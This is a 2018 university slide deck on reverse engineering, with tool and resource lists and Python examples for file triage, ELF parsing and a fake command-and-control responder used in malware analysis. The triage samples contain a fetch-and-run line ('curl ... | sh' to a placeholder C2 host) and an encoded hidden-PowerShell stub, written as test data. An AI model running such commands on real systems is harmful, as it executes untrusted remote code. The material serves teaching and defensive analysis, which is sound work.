Reverse Engineering, CS 166, Armen Boursalian, 30 Apr 2018 (PowerPoint PPT Presentation)





SLIDE 1

Reverse Engineering

CS 166 Armen Boursalian 30 Apr 2018

SLIDE 2

Reverse Engineering

  • Take a product, understand how it works
  • Usually limited to certain aspects, not full systems
  • Need to know a little bit about a lot of topics to gain understanding
  • Need to know a lot about a lot of topics to make significant changes
  • Often learning on the job
SLIDE 3

Capture the Flag (CTF)

  • Hacking competitions
  • Challenges presented; covers many topics
  • https://ctftime.org/

○ Register teams for leaderboard (not required)
○ Check calendar for upcoming CTFs

  • http://overthewire.org/wargames/

○ Similar, but not live/timed events

  • See Resources at the end for more
SLIDE 4

Concepts

  • Learn what type of object you are reverse engineering. Is it a(n)…

○ Windows EXE?
○ Office document?
○ Script?
○ Encoded/encrypted blob?

  • Let the malware (or object/code/whatever is in front of you) do the work
  • Google EVERYTHING
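A worked triage script for the checks above (an added example for these notes, not code from the slides): it identifies the object by its magic bytes, confirms a PE rather than a bare MZ stub by following e_lfanew, and for anything without a signature falls back to shebang, base64 and entropy tests. The sample blobs are constructed inline, and the label strings are this example's own.

```python
"""Identify what kind of object is in front of you before choosing a tool.

Added example for these notes, not code from the slides. All sample blobs
below are constructed inline so the script runs offline.
"""
import base64
import binascii
import math
import re
import string

_PRINTABLE = frozenset(string.printable.encode())

# Signatures checked after the MZ/PE case. Mach-O has several magics
# (32/64-bit, both byte orders, and the multi-arch "fat" header).
MAGICS = [
    (b"\x7fELF", "ELF (Linux)"),
    (b"\xfe\xed\xfa\xce", "Mach-O 32-bit"),
    (b"\xfe\xed\xfa\xcf", "Mach-O 64-bit"),
    (b"\xce\xfa\xed\xfe", "Mach-O 32-bit"),
    (b"\xcf\xfa\xed\xfe", "Mach-O 64-bit"),
    (b"\xca\xfe\xba\xbe", "Mach-O fat binary or Java .class (same magic; check the next bytes)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "OLE compound file (legacy Office .doc/.xls, may carry VBA macros)"),
    (b"PK\x03\x04", "ZIP container (OOXML .docx/.xlsx, JAR, APK: unzip and triage the members)"),
    (b"%PDF", "PDF"),
]


def pe_offset(data: bytes):
    """Offset of the PE\\0\\0 signature if this is a real PE image, else None.

    The DOS header's e_lfanew field at 0x3c points at the PE header; a bare
    MZ stub (or a truncated sample) has none.
    """
    if len(data) < 0x40 or not data.startswith(b"MZ"):
        return None
    off = int.from_bytes(data[0x3c:0x40], "little")
    return off if data[off:off + 4] == b"PE\x00\x00" else None


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4-6 for code/text, close to 8.0 for encrypted or compressed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


_B64_RE = re.compile(rb"^[A-Za-z0-9+/\r\n]+={0,2}\s*$")


def looks_base64(data: bytes) -> bool:
    """True when the blob is base64 text that decodes cleanly."""
    if len(data) < 16 or not _B64_RE.match(data):
        return False
    try:
        base64.b64decode(data)
    except (ValueError, binascii.Error):
        return False
    return True


def classify(data: bytes) -> str:
    """Coarse label for an unknown object: executable, document, script, blob, or unknown."""
    if data.startswith(b"MZ"):
        return "Windows PE" if pe_offset(data) is not None else "MZ stub only (DOS program or truncated PE)"
    for magic, label in MAGICS:
        if data.startswith(magic):
            return label
    head = data[:512]
    if head.startswith(b"#!"):
        interp = head.split(b"\n", 1)[0][2:].decode("ascii", "replace").strip()
        return "script (shebang: %s)" % interp
    if head and all(b in _PRINTABLE for b in head):
        if looks_base64(data):
            return "base64-encoded blob (decode it and classify the result)"
        return "text or script (check for VBScript/JScript/PowerShell/batch)"
    if shannon_entropy(data) > 7.5:
        return "high-entropy blob (encrypted, compressed or packed; unpack first)"
    return "unknown binary"


def _fake_pe() -> bytes:
    """Constructed MZ header whose e_lfanew points at a PE signature at 0x40."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3e)
    hdr[0x3c:0x40] = (0x40).to_bytes(4, "little")
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


SAMPLES = {  # constructed inputs, not real files
    "dropper.exe": _fake_pe(),
    "stub.exe": b"MZ" + b"\x00" * 100,
    "bot.elf": b"\x7fELF\x02\x01\x01" + b"\x00" * 57,
    "invoice.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24,
    "invoice.docx": b"PK\x03\x04\x14\x00" + b"\x00" * 26,
    "run.sh": b"#!/bin/sh\ncurl http://c2.example.invalid/x | sh\n",
    "payload.txt": base64.b64encode(b"powershell -nop -w hidden -enc " * 4),
    "config.bin": bytes(range(256)) * 4,
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        print("%-14s %5.2f bits/byte  %s" % (fname, shannon_entropy(blob), classify(blob)))
```

The entropy threshold is a heuristic: a packed PE still starts with MZ and will be labelled a PE, so run the entropy check again on individual sections once you have parsed the container.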
SLIDE 5

What we’ll be going over today...

  • A mix of FLARE-On + LabyREnth challenges
  • Real life malware
  • Introduction to tools used to reverse engineer
  • What to look for
  • Live demos from here on…
  • Please ask questions!
SLIDE 6

Resources - Debuggers

  • gdb

○ Linux, command line-based

  • WinDbg

○ Windows, command line-based

  • lldb

○ OSX, command line-based

  • x64dbg

○ Windows, GUI
○ https://x64dbg.com/

  • radare2

○ Multiplatform, command line-based (vim-like)
○ Significant learning curve, but very powerful!
○ https://github.com/radare/radare2/

  • IDA Pro (not the freeware version)
  • OllyDbg

○ Windows only
○ http://www.ollydbg.de/
○ Becoming outdated, but tried, tested, and trusted

  • edb-debugger

○ Linux, mainly
○ OllyDbg clone
○ https://github.com/eteran/edb-debugger

SLIDE 7

Resources - Disassemblers

  • All of the tools listed in Debuggers are also disassemblers
  • Capstone

○ For scripting; useful in Python
○ https://github.com/aquynh/capstone/

  • objdump (Linux)

○ CLI tool for dumping code and other artifacts out of ELF (Linux executable format) binaries

  • otool (objdump for OSX)

○ Also useful for parsing out the Mach-O executable file format for OSX binaries
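An added example (not objdump, otool or any code from the slides) of what a section dump pulls out of an ELF: the script builds a minimal little-endian ELF64 inline (constructed, not a real binary), parses the file and section headers with struct, resolves section names through .shstrtab and returns the bytes of each executable section, the way `objdump -h` and `objdump -d` start. The optional Capstone call assumes the capstone Python package is installed and returns None otherwise.

```python
"""Pull section headers and code bytes out of an ELF64 file, objdump -h style.

Added example for these notes, not code from the slides or from objdump.
The sample ELF is constructed inline so the script runs offline.
"""
import struct

ELF_HDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
SEC_HDR = struct.Struct("<IIQQQQIIQQ")          # Elf64_Shdr
SHT_PROGBITS, SHT_STRTAB, SHT_NOBITS = 1, 3, 8
SHF_ALLOC, SHF_EXECINSTR = 0x2, 0x4
EM_X86_64 = 0x3E


def build_sample_elf() -> bytes:
    """Constructed minimal ELF64: header, .text (4 bytes), .shstrtab, 3 section headers."""
    code = b"\x48\x31\xc0\xc3"                   # xor rax, rax ; ret
    shstrtab = b"\x00.text\x00.shstrtab\x00"     # name offsets: .text=1, .shstrtab=7
    text_off = ELF_HDR.size
    str_off = text_off + len(code)
    shoff = (str_off + len(shstrtab) + 7) & ~7  # section header table, 8-byte aligned
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELFCLASS64, LSB, version 1
    ehdr = ELF_HDR.pack(ident, 2, EM_X86_64, 1, 0x401000, 0, shoff, 0,
                        ELF_HDR.size, 0, 0, SEC_HDR.size, 3, 2)
    shdrs = SEC_HDR.pack(*([0] * 10))            # mandatory null section
    shdrs += SEC_HDR.pack(1, SHT_PROGBITS, SHF_ALLOC | SHF_EXECINSTR, 0x401000,
                          text_off, len(code), 0, 0, 16, 0)
    shdrs += SEC_HDR.pack(7, SHT_STRTAB, 0, 0, str_off, len(shstrtab), 0, 0, 1, 0)
    body = ehdr + code + shstrtab
    return body + b"\x00" * (shoff - len(body)) + shdrs


def parse_sections(data: bytes) -> dict:
    """Return entry point, machine and a list of sections with their raw bytes.

    Every offset is bounds-checked: malware routinely ships headers that point
    outside the file to crash or mislead naive parsers.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 file")
    (_ident, _type, e_machine, _ver, e_entry, _phoff, e_shoff, _flags, _ehsize,
     _phentsize, _phnum, e_shentsize, e_shnum, e_shstrndx) = ELF_HDR.unpack_from(data, 0)
    if e_shentsize != SEC_HDR.size or e_shoff + e_shnum * e_shentsize > len(data):
        raise ValueError("section header table is malformed or outside the file")
    if e_shstrndx >= e_shnum:
        raise ValueError("e_shstrndx out of range")
    raw = [SEC_HDR.unpack_from(data, e_shoff + i * e_shentsize) for i in range(e_shnum)]
    str_off, str_size = raw[e_shstrndx][4], raw[e_shstrndx][5]
    strtab = data[str_off:str_off + str_size]

    def name(idx: int) -> str:
        end = strtab.find(b"\x00", idx)
        return strtab[idx:end if end >= 0 else None].decode("latin-1")

    sections = []
    for sh_name, sh_type, sh_flags, sh_addr, sh_offset, sh_size, *_rest in raw:
        # SHT_NOBITS (.bss) occupies no file bytes, so its offset/size are not checked.
        if sh_type != SHT_NOBITS and sh_offset + sh_size > len(data):
            raise ValueError("section %r extends past end of file" % name(sh_name))
        sections.append({
            "name": name(sh_name), "type": sh_type, "flags": sh_flags,
            "addr": sh_addr, "offset": sh_offset, "size": sh_size,
            "bytes": b"" if sh_type == SHT_NOBITS else data[sh_offset:sh_offset + sh_size],
        })
    return {"entry": e_entry, "machine": e_machine, "sections": sections}


def code_sections(info: dict) -> list:
    """Sections flagged executable: the ones worth disassembling first."""
    return [s for s in info["sections"] if s["flags"] & SHF_EXECINSTR]


def disassemble(code: bytes, addr: int):
    """Disassemble x86-64 bytes with Capstone if it is installed, else None."""
    try:
        from capstone import Cs, CS_ARCH_X86, CS_MODE_64
    except ImportError:
        return None
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    return [(i.address, i.mnemonic, i.op_str) for i in md.disasm(code, addr)]


if __name__ == "__main__":
    info = parse_sections(build_sample_elf())
    print("entry 0x%x machine 0x%x" % (info["entry"], info["machine"]))
    for s in info["sections"]:
        print("%-12s off=0x%04x size=0x%04x flags=0x%x" % (s["name"], s["offset"], s["size"], s["flags"]))
    for s in code_sections(info):
        print(s["name"], disassemble(s["bytes"], s["addr"]) or s["bytes"].hex())
```

Section headers are optional for execution (the loader only reads program headers), so a stripped or deliberately damaged sample may have none; when that happens fall back to the program headers or a raw disassembly at the entry point.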

SLIDE 8

Resources - Dynamic Execution (Sandboxing)

  • Process Hacker 2

○ Advanced Task Manager for Windows, allows manipulating running processes, injecting code, etc.

  • procmon

○ Process monitor for Windows, allows viewing events generated by processes, e.g. files opened, processes executed, etc.

  • FakeNet

○ Intercept and, optionally, manipulate network traffic
○ Extensible with plugins so that you can write a fake command and control server to communicate with malware
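An added example of the fake command-and-control idea above, written as a stand-alone Python responder rather than a FakeNet plugin (it does not use FakeNet's plugin API). It logs each HTTP beacon and answers with a canned reply; the `/tasks` path and its `sleep` task are hypothetical choices for this example, as is the constructed sample beacon.

```python
"""Minimal fake C2 responder: log every beacon, answer with a canned reply.

Added example for these notes; it is a stand-alone script, not a FakeNet
plugin, and the /tasks path and "sleep" task are hypothetical choices.
Point the sample at this host (hosts file or DNS redirection) and watch LOG.
"""
import socketserver
from datetime import datetime, timezone

LOG = []  # every beacon seen, newest last


def parse_request(raw: bytes):
    """Split an HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        raise ValueError("not an HTTP request line: %r" % lines[0][:40])
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return parts[0].decode("latin-1"), parts[1].decode("latin-1"), headers, body


def handle_beacon(raw: bytes) -> bytes:
    """Record the beacon and return the bytes to send back.

    Tune the payload per sample: loaders often do nothing until they get a
    response shaped like what their real server would send.
    """
    method, path, headers, body = parse_request(raw)
    LOG.append({
        "time": datetime.now(timezone.utc).isoformat(timespec="seconds"),
        "method": method, "path": path,
        "host": headers.get("host"), "user-agent": headers.get("user-agent"),
        "body": body,
    })
    if path.startswith("/tasks"):
        payload = b'{"task":"sleep","seconds":60}'   # harmless order keeps the sample polling
    else:
        payload = b"OK"
    return (b"HTTP/1.1 200 OK\r\n"
            b"Server: Apache\r\n"
            b"Content-Type: application/json\r\n"
            b"Content-Length: %d\r\n"
            b"Connection: close\r\n\r\n" % len(payload)) + payload


class BeaconHandler(socketserver.BaseRequestHandler):
    def handle(self):
        raw = self.request.recv(65536)
        try:
            reply = handle_beacon(raw)
            last = LOG[-1]
            print("%s %s %s Host=%s UA=%s" % (last["time"], last["method"], last["path"],
                                              last["host"], last["user-agent"]))
        except ValueError as exc:
            print("non-HTTP traffic from %s: %s" % (self.client_address[0], exc))
            reply = b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
        self.request.sendall(reply)


def serve(host: str = "127.0.0.1", port: int = 8080) -> None:
    """Listen until interrupted; bind to 0.0.0.0 only inside an isolated lab network."""
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer((host, port), BeaconHandler) as srv:
        srv.serve_forever()


SAMPLE_BEACON = (  # constructed check-in, not captured traffic
    b"GET /tasks?id=deadbeef HTTP/1.1\r\n"
    b"Host: update.example.invalid\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\n"
    b"Connection: close\r\n\r\n"
)

if __name__ == "__main__":
    print(handle_beacon(SAMPLE_BEACON).decode())
    print(LOG[-1])
    serve()
```

The logged path, Host and User-Agent are exactly the fields you later turn into network detections; a beacon that speaks TLS or a custom binary protocol will hit the 400 branch, which tells you to intercept at a different layer.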

SLIDE 9

Resources - Reading Material

  • Practical Malware Analysis, by Michael Sikorski

○ Excellent malware analysis introduction with labs/questions and answers to guide you
○ Good for reverse engineering in general, not just malware

  • Reverse Engineering, by Bruce Dang
  • The Art of Memory Forensics, by Michael Hale Ligh
  • Follow people/organizations on Twitter

○ @TheHackerNews
■ Random security news
○ @patrickwardle
■ Former NSA; active in exploit research and writes many free tools for OSX defense
○ @virustotal
■ Online sandbox
○ @cyb3rops
■ Florian Roth (detections, malware/actor tracking)

SLIDE 10

Resources - CTFs

  • FLARE-On Challenge (http://flare-on.com/)

○ Past challenges can be downloaded in bulk; no need to solve in sequence
○ Search online for people’s writeups if you need help (Reddit, etc.)
○ Check back (or check Reddit/Twitter) in June/July for news on this year’s challenge

  • LabyREnth Challenge (https://labyrenth.com)

○ Past challenges may or may not be available; check it out
○ Check back (or check Reddit/Twitter) in June/July for news on this year’s challenge

  • Check CTF Time for upcoming events

○ https://ctftime.org/
○ 2 CTFs this weekend!

  • http://overthewire.org/wargames/

○ Similar, but not live/timed events

SLIDE 11

Resources - Conferences

  • DEFCON

○ Inexpensive
○ Presentations are often people’s pet projects
○ Various competitions and amusements
○ During late summers

  • BlackHat

○ Expensive
○ Geared toward training sessions
○ During late summers

  • RSA

○ Enterprise security products
○ Mid-spring (just passed 2 weeks ago)

  • Check around Twitter/Reddit/community for other conferences